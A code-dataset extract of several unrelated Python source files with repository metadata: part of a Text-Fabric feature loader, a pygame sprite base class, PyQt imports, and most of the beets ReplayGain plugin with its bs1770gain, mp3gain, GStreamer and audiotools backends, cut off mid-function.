maxNodeInData = max(oslotsData)
minNodeInData = min(oslotsData)
mappedSlotNodes = []
unmappedNodes = []
fakeNodes = []
start = min((maxSlot + 1, minNodeInData))
end = max((maxNode, maxNodeInData))
for n in range(start, end + 1):
if n in oslotsData:
if n <= maxSlot:
mappedSlotNodes.append(n)
elif n > maxNode:
fakeNodes.append(n)
else:
if maxSlot < n <= maxNode:
unmappedNodes.append(n)
if mappedSlotNodes:
self.tm.error(f'ERROR: {WARP[1]} maps slot nodes')
self.tm.error(makeExamples(mappedSlotNodes), tm=False)
good = False
if fakeNodes:
self.tm.error(f'ERROR: {WARP[1]} maps nodes that are not in {WARP[0]}')
self.tm.error(makeExamples(fakeNodes), tm=False)
good = False
if unmappedNodes:
self.tm.error(f'ERROR: {WARP[1]} fails to map nodes:')
unmappedByType = {}
for n in unmappedNodes:
unmappedByType.setdefault(otypeData.get(n, '_UNKNOWN_'), []).append(n)
for (nType, nodes) in sorted(
unmappedByType.items(),
key=lambda x: (-len(x[1]), x[0]),
):
self.tm.error(f'--- unmapped {nType:<10} : {makeExamples(nodes)}')
good = False
if good:
self.tm.info(f'OK: {WARP[1]} is valid')
for (fName, data, isEdge, isConfig) in todo:
edgeValues = False
fMeta = {}
fMeta.update(metaData.get('', {}))
fMeta.update(metaData.get(fName, {}))
if fMeta.get('edgeValues', False):
edgeValues = True
if 'edgeValues' in fMeta:
del fMeta['edgeValues']
fObj = Data(
f'{self.writeDir}/{fName}.tf',
self.tm,
data=data,
metaData=fMeta,
isEdge=isEdge,
isConfig=isConfig,
edgeValues=edgeValues,
)
tag = 'config' if isConfig else 'edge' if isEdge else 'node'
if fObj.save(
nodeRanges=fName == WARP[0],
overwrite=True,
):
total[tag] += 1
else:
failed[tag] += 1
self.tm.indent(level=0)
self.tm.info(
'Exported {} node features and {} edge features and {} config features to {}'.format(
total['node'],
total['edge'],
total['config'],
self.writeDir,
)
)
if len(failed):
for (tag, nf) in sorted(failed.items()):
self.tm.error(f'Failed to export {nf} {tag} features')
good = False
if silent is not None:
self.tm.setSilent(wasSilent)
return good
def exportMQL(self, mqlName, mqlDir):
self.tm.indent(level=0, reset=True)
mqlDir = expandDir(self, mqlDir)
mqlNameClean = cleanName(mqlName)
mql = MQL(mqlDir, mqlNameClean, self.features, self.tm)
mql.write()
def importMQL(self, mqlFile, slotType=None, otext=None, meta=None):
self.tm.indent(level=0, reset=True)
(good, nodeFeatures, edgeFeatures,
metaData) = tfFromMql(mqlFile, self.tm, slotType=slotType, otext=otext, meta=meta)
if good:
self.save(nodeFeatures=nodeFeatures, edgeFeatures=edgeFeatures, metaData=metaData)
def _loadFeature(self, fName, optional=False):
if not self.good:
return False
silent = self.tm.isSilent()
if fName not in self.features:
if not optional:
self.tm.error(f'Feature "{fName}" not available in\n{self.locationRep}')
self.good = False
else:
# if not self.features[fName].load(silent=silent or (fName not in self.featuresRequested)):
if not self.features[fName].load(silent=silent):
self.good = False
def _makeIndex(self):
self.features = {}
self.featuresIgnored = {}
tfFiles = {}
for loc in self.locations:
for mod in self.modules:
dirF = f'{loc}/{mod}'
if not os.path.exists(dirF):
continue
with os.scandir(dirF) as sd:
files = tuple(e.name for e in sd if e.is_file() and e.name.endswith('.tf'))
for fileF in files:
(fName, ext) = os.path.splitext(fileF)
tfFiles.setdefault(fName, []).append(f'{dirF}/{fileF}')
for (fName, featurePaths) in sorted(tfFiles.items()):
chosenFPath = featurePaths[-1]
for featurePath in sorted(set(featurePaths[0:-1])):
if featurePath != chosenFPath:
self.featuresIgnored.setdefault(fName, []).append(featurePath)
self.features[fName] = Data(chosenFPath, self.tm)
self._getWriteLoc()
self.tm.info(
'{} features found and {} ignored'.format(
len(tfFiles),
sum(len(x) for x in self.featuresIgnored.values()),
), tm=False
)
good = True
for fName in WARP:
if fName not in self.features:
if fName == WARP[2]:
self.tm.info((f'Warp feature "{WARP[2]}" not found. Working without Text-API\n'))
self.features[WARP[2]] = Data(
f'{WARP[2]}.tf',
self.tm,
isConfig=True,
metaData=WARP2_DEFAULT,
)
self.features[WARP[2]].dataLoaded = True
else:
self.tm.info(f'Warp feature "{fName}" not found in\n{self.locationRep}')
good = False
elif fName == WARP[2]:
self._loadFeature(fName, optional=True)
if not good:
return False
self.warpDir = self.features[WARP[0]].dirName
self.precomputeList = []
for (dep2, fName, method, dependencies) in PRECOMPUTE:
thisGood = True
if dep2 and WARP[2] not in self.features:
continue
if dep2:
otextMeta = self.features[WARP[2]].metaData
sFeatures = f'{KIND[fName]}Features'
sFeats = tuple(itemize(otextMeta.get(sFeatures, ''), ','))
dependencies = dependencies + sFeats
for dep in dependencies:
if dep not in self.features:
self.tm.info(f'Missing dependency for computed data feature "{fName}": "{dep}"')
thisGood = False
if not thisGood:
good = False
self.features[fName] = Data(
f'{self.warpDir}/{fName}.x',
self.tm,
method=method,
dependencies=[self.features.get(dep, None) for dep in dependencies],
)
self.precomputeList.append((fName, dep2))
self.good = good
def _getWriteLoc(self, location=None, module=None):
writeLoc = (
os.path.expanduser(location)
if location is not None else
''
if len(self.locations) == 0 else
self.locations[-1]
)
writeMod = (
module
if module is not None else
''
if len(self.modules) == 0 else
self.modules[-1]
)
self.writeDir = (
f'{writeLoc}{writeMod}' if writeLoc == '' or writeMod == '' else f'{writeLoc}/{writeMod}'
)
def _precompute(self):
good = True
for (fName, dep2) in self.precomputeList:
ok = getattr(self, f'{fName.strip("_")}OK', False)
if dep2 and not ok:
continue
if not self.features[fName].load():
good = False
break
self.good = good
def _makeApi(self):
if not self.good:
return None
silent = self.tm.isSilent()
api = Api(self)
w0info = self.features[WARP[0]]
w1info = self.features[WARP[1]]
setattr(api.F, WARP[0], OtypeFeature(api, w0info.metaData, w0info.data))
setattr(api.E, WARP[1], OslotsFeature(api, w1info.metaData, w1info.data))
requestedSet = set(self.featuresRequested)
for fName in self.features:
fObj = self.features[fName]
if fObj.dataLoaded and not fObj.isConfig:
if fObj.method:
feat = fName.strip('_')
ok = getattr(self, f'{feat}OK', False)
ap = api.C
if fName in [x[0] for x in self.precomputeList if not x[1] or ok]:
setattr(ap, feat, Computed(api, fObj.data))
else:
fObj.unload()
if hasattr(ap, feat):
delattr(api.C, feat)
else:
if fName in requestedSet | self.textFeatures:
if fName in WARP:
continue
elif fObj.isEdge:
setattr(api.E, fName, EdgeFeature(api, fObj.metaData, fObj.data, fObj.edgeValues))
else:
setattr(api.F, fName, NodeFeature(api, fObj.metaData, fObj.data))
else:
if (
fName in WARP or
fName in self.textFeatures
):
continue
elif fObj.isEdge:
if hasattr(api.E, fName):
delattr(api.E, fName)
else:
if hasattr(api.F, fName):
delattr(api.F, fName)
fObj.unload()
addSortKey(api)
addOtype(api)
addLocality(api)
addRank(api)
addText(api)
addSearch(api, silent)
self.tm.indent(level=0)
self.tm.info('All features loaded/computed - for details use loadLog()')
self.api = api
return api
def _updateApi(self):
if not self.good:
return None
api = self.api
requestedSet = set(self.featuresRequested)
for fName in self.features:
fObj = self.features[fName]
if fObj.dataLoaded and not fObj.isConfig:
if not fObj.method:
if fName in requestedSet | self.textFeatures:
if fName in WARP:
continue
elif fObj.isEdge:
if not hasattr(api.E, fName):
setattr(api.E, fName, EdgeFeature(api, fObj.metaData, fObj.data, fObj.edgeValues))
else:
if not hasattr(api.F, fName):
setattr(api.F, fName, NodeFeature(api, fObj.metaData, fObj.data))
else:
if (
fName in WARP or
fName in self.textFeatures
):
continue
elif fObj.isEdge:
if hasattr(api.E, fName):
delattr(api.E, fName)
else:
if hasattr(api.F, fName):
delattr(api.F, fName)
fObj.unload()
self.tm.indent(level=0)
self.tm.info('All additional features loaded - for details use loadLog()')
| 32.522034
| 98
| 0.58547
|
4a0e9fe301533dab87d6a69aca096e0f0f61a66e
| 1,003
|
py
|
Python
|
Live/sprites/__base.py
|
Pawel095/PJ_Pygame_Prezentacja
|
f6ace78c2df504a262eac6b1ae46d458939dd0c0
|
[
"MIT"
] | null | null | null |
Live/sprites/__base.py
|
Pawel095/PJ_Pygame_Prezentacja
|
f6ace78c2df504a262eac6b1ae46d458939dd0c0
|
[
"MIT"
] | null | null | null |
Live/sprites/__base.py
|
Pawel095/PJ_Pygame_Prezentacja
|
f6ace78c2df504a262eac6b1ae46d458939dd0c0
|
[
"MIT"
] | null | null | null |
import pygame
import global_vars as g
class Base:
def __init__(self):
self.speed=300
self.position=(100,100)
self.velocity=(0,0)
self.acceleration=(0,0)
self.alive = True
def __linear_update(self,deltaT):
px,py = self.position
vx,vy = self.velocity
ax,ay = self.acceleration
self.velocity=(ax*deltaT + vx,ay*deltaT+vy)
self.position=(px+ vx*deltaT +ax*deltaT**2,py+ vy*deltaT +ay*deltaT**2)
def is_outside_screen(self):
return (
self.position[0] + self.size[0] <= 0
or self.position[1] + self.size[1] <= 0
or self.position[0] >= g.SCREEN_SIZE[0]
or self.position[1] >= g.SCREEN_SIZE[1]
)
def update(self,deltaT):
self.__linear_update(deltaT)
def draw(self):
center = (self.position[0] - self.size[0]/2,self.position[1] - self.size[1]/2)
srf = pygame.display.get_surface()
srf.blit(self.sprite,center)
| 28.657143
| 86
| 0.582253
|
4a0ea0107d37e256afa235e24a6b4de37b3498d7
| 1,362
|
py
|
Python
|
dssvue/mplqt.py
|
gyanz/dssvue
|
c2d6e48f2c83319f70116dbda0346ae53adb9297
|
[
"MIT"
] | 9
|
2019-09-21T20:03:59.000Z
|
2022-01-03T16:19:47.000Z
|
dssvue/mplqt.py
|
gyanz/dssvue
|
c2d6e48f2c83319f70116dbda0346ae53adb9297
|
[
"MIT"
] | 1
|
2019-11-01T20:06:21.000Z
|
2019-11-08T15:12:20.000Z
|
dssvue/mplqt.py
|
gyanz/dssvue
|
c2d6e48f2c83319f70116dbda0346ae53adb9297
|
[
"MIT"
] | null | null | null |
from PyQt5 import uic
from PyQt5 import QtGui
from PyQt5.QtGui import (QColor,QIcon,QTextCursor)
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import (QApplication,QMainWindow,QDialog,QCheckBox,QComboBox,
QWidgetAction,QLabel,QFileDialog,
QAbstractItemView,QAction,QActionGroup,
QSizePolicy,QVBoxLayout,QHBoxLayout,
QTableWidget,QTableWidgetItem,QWidget,
QTableView,
QHeaderView,
QDialogButtonBox,QButtonGroup,QRadioButton, QToolBar)
from PyQt5 import QtCore
from PyQt5.QtCore import (QThread,QMutex,QReadWriteLock,QMutexLocker,QSettings,
pyqtSignal,Qt,QSortFilterProxyModel)
'''
import matplotlib as mpl
mpl.use('Qt5Agg')
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
import matplotlib.pyplot as plt
'''
import pyqtgraph as pg
from pyqtgraph.imageview.ImageView import ImageView
from pyqtgraph.widgets.MatplotlibWidget import MatplotlibWidget
QAPP = None
def mkQApp():
global QAPP
QAPP = QtGui.QApplication.instance()
if QAPP is None:
QAPP = QtGui.QApplication([])
return QAPP
| 34.923077
| 88
| 0.688693
|
4a0ea064f1120ce0bb26d9778eeddd520e752266
| 39,721
|
py
|
Python
|
beetsplug/replaygain.py
|
arcresu/beets
|
3161e2722670884884adcdaddd25591e3bef3dc4
|
[
"MIT"
] | null | null | null |
beetsplug/replaygain.py
|
arcresu/beets
|
3161e2722670884884adcdaddd25591e3bef3dc4
|
[
"MIT"
] | null | null | null |
beetsplug/replaygain.py
|
arcresu/beets
|
3161e2722670884884adcdaddd25591e3bef3dc4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Fabrice Laporte, Yevgeny Bezman, and Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
from __future__ import division, absolute_import, print_function
import subprocess
import os
import collections
import sys
import warnings
import xml.parsers.expat
from six.moves import zip
from beets import ui
from beets.plugins import BeetsPlugin
from beets.util import (syspath, command_output, bytestring_path,
displayable_path, py3_path)
# Utilities.
class ReplayGainError(Exception):
"""Raised when a local (to a track or an album) error occurs in one
of the backends.
"""
class FatalReplayGainError(Exception):
"""Raised when a fatal error occurs in one of the backends.
"""
class FatalGstreamerPluginReplayGainError(FatalReplayGainError):
"""Raised when a fatal error occurs in the GStreamerBackend when
loading the required plugins."""
def call(args):
"""Execute the command and return its output or raise a
ReplayGainError on failure.
"""
try:
return command_output(args)
except subprocess.CalledProcessError as e:
raise ReplayGainError(
u"{0} exited with status {1}".format(args[0], e.returncode)
)
except UnicodeEncodeError:
# Due to a bug in Python 2's subprocess on Windows, Unicode
# filenames can fail to encode on that platform. See:
# https://github.com/google-code-export/beets/issues/499
raise ReplayGainError(u"argument encoding failed")
# Backend base and plumbing classes.
Gain = collections.namedtuple("Gain", "gain peak")
AlbumGain = collections.namedtuple("AlbumGain", "album_gain track_gains")
class Backend(object):
"""An abstract class representing engine for calculating RG values.
"""
def __init__(self, config, log):
"""Initialize the backend with the configuration view for the
plugin.
"""
self._log = log
def compute_track_gain(self, items):
raise NotImplementedError()
def compute_album_gain(self, album):
# TODO: implement album gain in terms of track gain of the
# individual tracks which can be used for any backend.
raise NotImplementedError()
# bsg1770gain backend
class Bs1770gainBackend(Backend):
"""bs1770gain is a loudness scanner compliant with ITU-R BS.1770 and
its flavors EBU R128, ATSC A/85 and Replaygain 2.0.
"""
def __init__(self, config, log):
super(Bs1770gainBackend, self).__init__(config, log)
config.add({
'chunk_at': 5000,
'method': 'replaygain',
})
self.chunk_at = config['chunk_at'].as_number()
self.method = '--' + config['method'].as_str()
cmd = 'bs1770gain'
try:
call([cmd, self.method])
self.command = cmd
except OSError:
raise FatalReplayGainError(
u'Is bs1770gain installed? Is your method in config correct?'
)
if not self.command:
raise FatalReplayGainError(
u'no replaygain command found: install bs1770gain'
)
def compute_track_gain(self, items):
"""Computes the track gain of the given tracks, returns a list
of TrackGain objects.
"""
output = self.compute_gain(items, False)
return output
def compute_album_gain(self, album):
"""Computes the album gain of the given album, returns an
AlbumGain object.
"""
# TODO: What should be done when not all tracks in the album are
# supported?
supported_items = album.items()
output = self.compute_gain(supported_items, True)
if not output:
raise ReplayGainError(u'no output from bs1770gain')
return AlbumGain(output[-1], output[:-1])
def isplitter(self, items, chunk_at):
"""Break an iterable into chunks of at most size `chunk_at`,
generating lists for each chunk.
"""
iterable = iter(items)
while True:
result = []
for i in range(chunk_at):
try:
a = next(iterable)
except StopIteration:
break
else:
result.append(a)
if result:
yield result
else:
break
def compute_gain(self, items, is_album):
"""Computes the track or album gain of a list of items, returns
a list of TrackGain objects.
When computing album gain, the last TrackGain object returned is
the album gain
"""
if len(items) == 0:
return []
albumgaintot = 0.0
albumpeaktot = 0.0
returnchunks = []
# In the case of very large sets of music, we break the tracks
# into smaller chunks and process them one at a time. This
# avoids running out of memory.
if len(items) > self.chunk_at:
i = 0
for chunk in self.isplitter(items, self.chunk_at):
i += 1
returnchunk = self.compute_chunk_gain(chunk, is_album)
albumgaintot += returnchunk[-1].gain
albumpeaktot = max(albumpeaktot, returnchunk[-1].peak)
returnchunks = returnchunks + returnchunk[0:-1]
returnchunks.append(Gain(albumgaintot / i, albumpeaktot))
return returnchunks
else:
return self.compute_chunk_gain(items, is_album)
def compute_chunk_gain(self, items, is_album):
"""Compute ReplayGain values and return a list of results
dictionaries as given by `parse_tool_output`.
"""
# Construct shell command.
cmd = [self.command]
cmd += [self.method]
cmd += ['--xml', '-p']
# Workaround for Windows: the underlying tool fails on paths
# with the \\?\ prefix, so we don't use it here. This
# prevents the backend from working with long paths.
args = cmd + [syspath(i.path, prefix=False) for i in items]
path_list = [i.path for i in items]
# Invoke the command.
self._log.debug(
u'executing {0}', u' '.join(map(displayable_path, args))
)
output = call(args)
self._log.debug(u'analysis finished: {0}', output)
results = self.parse_tool_output(output, path_list, is_album)
self._log.debug(u'{0} items, {1} results', len(items), len(results))
return results
def parse_tool_output(self, text, path_list, is_album):
"""Given the output from bs1770gain, parse the text and
return a list of dictionaries
containing information about each analyzed file.
"""
per_file_gain = {}
album_gain = {} # mutable variable so it can be set from handlers
parser = xml.parsers.expat.ParserCreate(encoding='utf-8')
state = {'file': None, 'gain': None, 'peak': None}
def start_element_handler(name, attrs):
if name == u'track':
state['file'] = bytestring_path(attrs[u'file'])
if state['file'] in per_file_gain:
raise ReplayGainError(
u'duplicate filename in bs1770gain output')
elif name == u'integrated':
state['gain'] = float(attrs[u'lu'])
elif name == u'sample-peak':
state['peak'] = float(attrs[u'factor'])
def end_element_handler(name):
if name == u'track':
if state['gain'] is None or state['peak'] is None:
raise ReplayGainError(u'could not parse gain or peak from '
'the output of bs1770gain')
per_file_gain[state['file']] = Gain(state['gain'],
state['peak'])
state['gain'] = state['peak'] = None
elif name == u'summary':
if state['gain'] is None or state['peak'] is None:
raise ReplayGainError(u'could not parse gain or peak from '
'the output of bs1770gain')
album_gain["album"] = Gain(state['gain'], state['peak'])
state['gain'] = state['peak'] = None
parser.StartElementHandler = start_element_handler
parser.EndElementHandler = end_element_handler
try:
parser.Parse(text, True)
except xml.parsers.expat.ExpatError:
raise ReplayGainError(
u'The bs1770gain tool produced malformed XML. '
'Using version >=0.4.10 may solve this problem.'
)
if len(per_file_gain) != len(path_list):
raise ReplayGainError(
u'the number of results returned by bs1770gain does not match '
'the number of files passed to it')
# bs1770gain does not return the analysis results in the order that
# files are passed on the command line, because it is sorting the files
# internally. We must recover the order from the filenames themselves.
try:
out = [per_file_gain[os.path.basename(p)] for p in path_list]
except KeyError:
raise ReplayGainError(
u'unrecognized filename in bs1770gain output '
'(bs1770gain can only deal with utf-8 file names)')
if is_album:
out.append(album_gain["album"])
return out
# mpgain/aacgain CLI tool backend.
class CommandBackend(Backend):
def __init__(self, config, log):
super(CommandBackend, self).__init__(config, log)
config.add({
'command': u"",
'noclip': True,
})
self.command = config["command"].as_str()
if self.command:
# Explicit executable path.
if not os.path.isfile(self.command):
raise FatalReplayGainError(
u'replaygain command does not exist: {0}'.format(
self.command)
)
else:
# Check whether the program is in $PATH.
for cmd in ('mp3gain', 'aacgain'):
try:
call([cmd, '-v'])
self.command = cmd
except OSError:
pass
if not self.command:
raise FatalReplayGainError(
u'no replaygain command found: install mp3gain or aacgain'
)
self.noclip = config['noclip'].get(bool)
target_level = config['targetlevel'].as_number()
self.gain_offset = int(target_level - 89)
def compute_track_gain(self, items):
"""Computes the track gain of the given tracks, returns a list
of TrackGain objects.
"""
supported_items = list(filter(self.format_supported, items))
output = self.compute_gain(supported_items, False)
return output
def compute_album_gain(self, album):
"""Computes the album gain of the given album, returns an
AlbumGain object.
"""
# TODO: What should be done when not all tracks in the album are
# supported?
supported_items = list(filter(self.format_supported, album.items()))
if len(supported_items) != len(album.items()):
self._log.debug(u'tracks are of unsupported format')
return AlbumGain(None, [])
output = self.compute_gain(supported_items, True)
return AlbumGain(output[-1], output[:-1])
def format_supported(self, item):
"""Checks whether the given item is supported by the selected tool.
"""
if 'mp3gain' in self.command and item.format != 'MP3':
return False
elif 'aacgain' in self.command and item.format not in ('MP3', 'AAC'):
return False
return True
def compute_gain(self, items, is_album):
"""Computes the track or album gain of a list of items, returns
a list of TrackGain objects.
When computing album gain, the last TrackGain object returned is
the album gain
"""
if len(items) == 0:
self._log.debug(u'no supported tracks to analyze')
return []
"""Compute ReplayGain values and return a list of results
dictionaries as given by `parse_tool_output`.
"""
# Construct shell command. The "-o" option makes the output
# easily parseable (tab-delimited). "-s s" forces gain
# recalculation even if tags are already present and disables
# tag-writing; this turns the mp3gain/aacgain tool into a gain
# calculator rather than a tag manipulator because we take care
# of changing tags ourselves.
cmd = [self.command, '-o', '-s', 's']
if self.noclip:
# Adjust to avoid clipping.
cmd = cmd + ['-k']
else:
# Disable clipping warning.
cmd = cmd + ['-c']
cmd = cmd + ['-d', str(self.gain_offset)]
cmd = cmd + [syspath(i.path) for i in items]
self._log.debug(u'analyzing {0} files', len(items))
self._log.debug(u"executing {0}", " ".join(map(displayable_path, cmd)))
output = call(cmd)
self._log.debug(u'analysis finished')
return self.parse_tool_output(output,
len(items) + (1 if is_album else 0))
def parse_tool_output(self, text, num_lines):
"""Given the tab-delimited output from an invocation of mp3gain
or aacgain, parse the text and return a list of dictionaries
containing information about each analyzed file.
"""
out = []
for line in text.split(b'\n')[1:num_lines + 1]:
parts = line.split(b'\t')
if len(parts) != 6 or parts[0] == b'File':
self._log.debug(u'bad tool output: {0}', text)
raise ReplayGainError(u'mp3gain failed')
d = {
'file': parts[0],
'mp3gain': int(parts[1]),
'gain': float(parts[2]),
'peak': float(parts[3]) / (1 << 15),
'maxgain': int(parts[4]),
'mingain': int(parts[5]),
}
out.append(Gain(d['gain'], d['peak']))
return out
# GStreamer-based backend.
class GStreamerBackend(Backend):
def __init__(self, config, log):
super(GStreamerBackend, self).__init__(config, log)
self._import_gst()
# Initialized a GStreamer pipeline of the form filesrc ->
# decodebin -> audioconvert -> audioresample -> rganalysis ->
# fakesink The connection between decodebin and audioconvert is
# handled dynamically after decodebin figures out the type of
# the input file.
self._src = self.Gst.ElementFactory.make("filesrc", "src")
self._decbin = self.Gst.ElementFactory.make("decodebin", "decbin")
self._conv = self.Gst.ElementFactory.make("audioconvert", "conv")
self._res = self.Gst.ElementFactory.make("audioresample", "res")
self._rg = self.Gst.ElementFactory.make("rganalysis", "rg")
if self._src is None or self._decbin is None or self._conv is None \
or self._res is None or self._rg is None:
raise FatalGstreamerPluginReplayGainError(
u"Failed to load required GStreamer plugins"
)
# We check which files need gain ourselves, so all files given
# to rganalsys should have their gain computed, even if it
# already exists.
self._rg.set_property("forced", True)
self._rg.set_property("reference-level",
config["targetlevel"].as_number())
self._sink = self.Gst.ElementFactory.make("fakesink", "sink")
self._pipe = self.Gst.Pipeline()
self._pipe.add(self._src)
self._pipe.add(self._decbin)
self._pipe.add(self._conv)
self._pipe.add(self._res)
self._pipe.add(self._rg)
self._pipe.add(self._sink)
self._src.link(self._decbin)
self._conv.link(self._res)
self._res.link(self._rg)
self._rg.link(self._sink)
self._bus = self._pipe.get_bus()
self._bus.add_signal_watch()
self._bus.connect("message::eos", self._on_eos)
self._bus.connect("message::error", self._on_error)
self._bus.connect("message::tag", self._on_tag)
# Needed for handling the dynamic connection between decodebin
# and audioconvert
self._decbin.connect("pad-added", self._on_pad_added)
self._decbin.connect("pad-removed", self._on_pad_removed)
self._main_loop = self.GLib.MainLoop()
self._files = []
def _import_gst(self):
"""Import the necessary GObject-related modules and assign `Gst`
and `GObject` fields on this object.
"""
try:
import gi
except ImportError:
raise FatalReplayGainError(
u"Failed to load GStreamer: python-gi not found"
)
try:
gi.require_version('Gst', '1.0')
except ValueError as e:
raise FatalReplayGainError(
u"Failed to load GStreamer 1.0: {0}".format(e)
)
from gi.repository import GObject, Gst, GLib
# Calling GObject.threads_init() is not needed for
# PyGObject 3.10.2+
with warnings.catch_warnings():
warnings.simplefilter("ignore")
GObject.threads_init()
Gst.init([sys.argv[0]])
self.GObject = GObject
self.GLib = GLib
self.Gst = Gst
def compute(self, files, album):
self._error = None
self._files = list(files)
if len(self._files) == 0:
return
self._file_tags = collections.defaultdict(dict)
if album:
self._rg.set_property("num-tracks", len(self._files))
if self._set_first_file():
self._main_loop.run()
if self._error is not None:
raise self._error
def compute_track_gain(self, items):
self.compute(items, False)
if len(self._file_tags) != len(items):
raise ReplayGainError(u"Some tracks did not receive tags")
ret = []
for item in items:
ret.append(Gain(self._file_tags[item]["TRACK_GAIN"],
self._file_tags[item]["TRACK_PEAK"]))
return ret
def compute_album_gain(self, album):
items = list(album.items())
self.compute(items, True)
if len(self._file_tags) != len(items):
raise ReplayGainError(u"Some items in album did not receive tags")
# Collect track gains.
track_gains = []
for item in items:
try:
gain = self._file_tags[item]["TRACK_GAIN"]
peak = self._file_tags[item]["TRACK_PEAK"]
except KeyError:
raise ReplayGainError(u"results missing for track")
track_gains.append(Gain(gain, peak))
# Get album gain information from the last track.
last_tags = self._file_tags[items[-1]]
try:
gain = last_tags["ALBUM_GAIN"]
peak = last_tags["ALBUM_PEAK"]
except KeyError:
raise ReplayGainError(u"results missing for album")
return AlbumGain(Gain(gain, peak), track_gains)
def close(self):
self._bus.remove_signal_watch()
def _on_eos(self, bus, message):
# A file finished playing in all elements of the pipeline. The
# RG tags have already been propagated. If we don't have a next
# file, we stop processing.
if not self._set_next_file():
self._pipe.set_state(self.Gst.State.NULL)
self._main_loop.quit()
def _on_error(self, bus, message):
self._pipe.set_state(self.Gst.State.NULL)
self._main_loop.quit()
err, debug = message.parse_error()
f = self._src.get_property("location")
# A GStreamer error, either an unsupported format or a bug.
self._error = ReplayGainError(
u"Error {0!r} - {1!r} on file {2!r}".format(err, debug, f)
)
def _on_tag(self, bus, message):
tags = message.parse_tag()
def handle_tag(taglist, tag, userdata):
# The rganalysis element provides both the existing tags for
# files and the new computes tags. In order to ensure we
# store the computed tags, we overwrite the RG values of
# received a second time.
if tag == self.Gst.TAG_TRACK_GAIN:
self._file_tags[self._file]["TRACK_GAIN"] = \
taglist.get_double(tag)[1]
elif tag == self.Gst.TAG_TRACK_PEAK:
self._file_tags[self._file]["TRACK_PEAK"] = \
taglist.get_double(tag)[1]
elif tag == self.Gst.TAG_ALBUM_GAIN:
self._file_tags[self._file]["ALBUM_GAIN"] = \
taglist.get_double(tag)[1]
elif tag == self.Gst.TAG_ALBUM_PEAK:
self._file_tags[self._file]["ALBUM_PEAK"] = \
taglist.get_double(tag)[1]
elif tag == self.Gst.TAG_REFERENCE_LEVEL:
self._file_tags[self._file]["REFERENCE_LEVEL"] = \
taglist.get_double(tag)[1]
tags.foreach(handle_tag, None)
def _set_first_file(self):
if len(self._files) == 0:
return False
self._file = self._files.pop(0)
self._pipe.set_state(self.Gst.State.NULL)
self._src.set_property("location", py3_path(syspath(self._file.path)))
self._pipe.set_state(self.Gst.State.PLAYING)
return True
def _set_file(self):
"""Initialize the filesrc element with the next file to be analyzed.
"""
# No more files, we're done
if len(self._files) == 0:
return False
self._file = self._files.pop(0)
# Ensure the filesrc element received the paused state of the
# pipeline in a blocking manner
self._src.sync_state_with_parent()
self._src.get_state(self.Gst.CLOCK_TIME_NONE)
# Ensure the decodebin element receives the paused state of the
# pipeline in a blocking manner
self._decbin.sync_state_with_parent()
self._decbin.get_state(self.Gst.CLOCK_TIME_NONE)
# Disconnect the decodebin element from the pipeline, set its
# state to READY to to clear it.
self._decbin.unlink(self._conv)
self._decbin.set_state(self.Gst.State.READY)
# Set a new file on the filesrc element, can only be done in the
# READY state
self._src.set_state(self.Gst.State.READY)
self._src.set_property("location", py3_path(syspath(self._file.path)))
self._decbin.link(self._conv)
self._pipe.set_state(self.Gst.State.READY)
return True
def _set_next_file(self):
"""Set the next file to be analyzed while keeping the pipeline
in the PAUSED state so that the rganalysis element can correctly
handle album gain.
"""
# A blocking pause
self._pipe.set_state(self.Gst.State.PAUSED)
self._pipe.get_state(self.Gst.CLOCK_TIME_NONE)
# Try setting the next file
ret = self._set_file()
if ret:
# Seek to the beginning in order to clear the EOS state of the
# various elements of the pipeline
self._pipe.seek_simple(self.Gst.Format.TIME,
self.Gst.SeekFlags.FLUSH,
0)
self._pipe.set_state(self.Gst.State.PLAYING)
return ret
def _on_pad_added(self, decbin, pad):
sink_pad = self._conv.get_compatible_pad(pad, None)
assert(sink_pad is not None)
pad.link(sink_pad)
def _on_pad_removed(self, decbin, pad):
# Called when the decodebin element is disconnected from the
# rest of the pipeline while switching input files
peer = pad.get_peer()
assert(peer is None)
class AudioToolsBackend(Backend):
"""ReplayGain backend that uses `Python Audio Tools
<http://audiotools.sourceforge.net/>`_ and its capabilities to read more
file formats and compute ReplayGain values using it replaygain module.
"""
def __init__(self, config, log):
super(AudioToolsBackend, self).__init__(config, log)
self._import_audiotools()
def _import_audiotools(self):
"""Check whether it's possible to import the necessary modules.
There is no check on the file formats at runtime.
:raises :exc:`ReplayGainError`: if the modules cannot be imported
"""
try:
import audiotools
import audiotools.replaygain
except ImportError:
raise FatalReplayGainError(
u"Failed to load audiotools: audiotools not found"
)
self._mod_audiotools = audiotools
self._mod_replaygain = audiotools.replaygain
def open_audio_file(self, item):
"""Open the file to read the PCM stream from the using
``item.path``.
:return: the audiofile instance
:rtype: :class:`audiotools.AudioFile`
:raises :exc:`ReplayGainError`: if the file is not found or the
file format is not supported
"""
try:
audiofile = self._mod_audiotools.open(item.path)
except IOError:
raise ReplayGainError(
u"File {} was not found".format(item.path)
)
except self._mod_audiotools.UnsupportedFile:
raise ReplayGainError(
u"Unsupported file type {}".format(item.format)
)
return audiofile
def init_replaygain(self, audiofile, item):
"""Return an initialized :class:`audiotools.replaygain.ReplayGain`
instance, which requires the sample rate of the song(s) on which
the ReplayGain values will be computed. The item is passed in case
the sample rate is invalid to log the stored item sample rate.
:return: initialized replagain object
:rtype: :class:`audiotools.replaygain.ReplayGain`
:raises: :exc:`ReplayGainError` if the sample rate is invalid
"""
try:
rg = self._mod_replaygain.ReplayGain(audiofile.sample_rate())
except ValueError:
raise ReplayGainError(
u"Unsupported sample rate {}".format(item.samplerate))
return
return rg
def compute_track_gain(self, items):
"""Compute ReplayGain values for the requested items.
:return list: list of :class:`Gain` objects
"""
return [self._compute_track_gain(item) for item in items]
def _title_gain(self, rg, audiofile):
"""Get the gain result pair from PyAudioTools using the `ReplayGain`
instance `rg` for the given `audiofile`.
Wraps `rg.title_gain(audiofile.to_pcm())` and throws a
`ReplayGainError` when the library fails.
"""
try:
